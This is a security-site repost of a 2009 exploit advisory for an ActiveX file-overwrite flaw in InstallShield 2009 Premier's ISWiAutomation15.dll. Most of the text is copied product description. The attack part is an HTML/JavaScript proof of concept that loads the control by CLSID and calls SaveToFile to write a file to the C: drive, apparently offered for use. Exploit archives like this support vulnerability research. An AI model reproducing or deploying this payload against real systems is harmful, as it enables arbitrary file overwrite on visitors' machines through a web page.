首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Installshield 2009 Premier version 15.0.0.53 suffers from an Active-X related fi
来源:the_3dit0r[at]yahoo.com 作者:the_Edit0r 发布时间:2009-09-16  
"""""""""""""""""""""""""""""""""""""""""""""""""""""""""""
"""  :::::: ::   ::       ::        ::  ::  ::::        """
"""  ::      :: ::        :: :::::: .. ::::   ::        """
"""  :::::    :::   ::::: :: ::  :: ::  ::  ::::        """
"""  ::      :: ::  ::  : :: ::  :: ::  ::    ::        """
"""  :::::: ::   :: ::::: :: :::::: ::  ::  :::: rs.ir  """
"""                 ::                                  """
"""                                                     """
"""""""""""""""""""""""""""""""""""""""""""""""""""""""""""
   Anti-Security Research Team & Security Institute

#[+] Bug : Installshiled 2009 premier 15.0.0.53 Activex (ISWiAutomation15.dll) File Overwrite Expl0it
#[+] program  Download : http://www.installshield.com/downloads
#[+] Author : the_Edit0r
#[+] Contact me : the_3dit0r[at]Yahoo[dot]coM
#[+] Greetz to all my friends
#[+] Tested on: Windows XP Pro SP2 with Internet Explorer 7
#[+] web site: Expl0iters.ir  * Anti-security.ir
#[+] Big thnx: Aria-Security Team & H4ckcity Member


# Part Description :
--------------------

InstallShield lets you easily create Windows Installer and InstallScript installations and extend them
to database servers, Web services, and mobile devices. New Features InstallShield includes the following
new features. Ability to Associate InstallShield Prerequisites with Features for Chaining Installations
InstallShield now enables you to associate InstallShield prerequisites with one or more features. This
new type of InstallShield prerequisite is called a feature prerequisite. It is installed if a feature
that contains the prerequisite is installed and if the prerequisite is not already installed on the system.
Including InstallShield prerequisites in your project enables you to chain multiple installations together,
bypassing the Windows Installer limitation that permits only one Execute sequence to be run at a time.The
Setup.exe setup launcher serves as a bootstrap application that manages the chaining. The Redistributables
view is where you add InstallShield prerequisites to a project and specify whether you want them to run
before your main installation or be associated with one or more features in your main installation.Previously,
all InstallShield prerequisite installations were run before the main installation ran, and the InstallShield
prerequisites could not be associated with any features. This type of prerequisite, which is still available,
is called a setup prerequisite. Basic MSI and Web projects include support for this feature. 

------------------------------------

targetFile = "E:\Program Files\InstallShield\2009\System\ISWiAutomation15.dll"
prototype  = "Function InsertCustomAction ( ByVal pCustomAction As _ISWiCustomAction ,  ByVal sComment As String ,  ByVal sCondition As String ,  ByVal lSequenceNumber As Long ) As _ISWiSequenceRecord"
memberName = "InsertCustomAction"
progid     = "ISWiAuto15.ISWiSequence"

# Part Expl0it & Bug Codes ( Poc ) : 
------------------------------------

<b>
Installshiled 2009 premier 15.0.0.53 File Overwrite Expl0it <b/>
                     by : the_Edit0r                        <b/>
<b/>
<object classid='clsid:34E7A6F9-F260-46BD-AAC8-1E70E22139D2' id='Edit0r'></object>
<script>

try{
    var obj = document.InsertCustomAction('Edit0r');
    obj.AddPage(1);
    obj.SaveToFile("C:/system_.ini");
    window.alert('check C:');
} catch(err){  window.alert('Poc failed'); }
</script>


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·DJ Studio Pro 4.2 (.PLS file)
·Soritong MP3 Player version 1.
·BigAnt Server 2.50 GET Request
·MP3 Collector 2.3 (m3u File) L
·BigAnt Server 2.50 SP1 (ZIP Fi
·SAP Player 0.9 (.pla) Universa
·Joomla Component com_jlord_rss
·VLC Media Player < 0.9.6 (CUE)
·Saphplesson 4.3 Remote Blind S
·EasyMail Quicksoft 6.0.2.0 (Cr
·Notepad++ 5.4.5 Local .C/CPP S
·EasyMail Quicksoft 6.0.2.0 Act
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved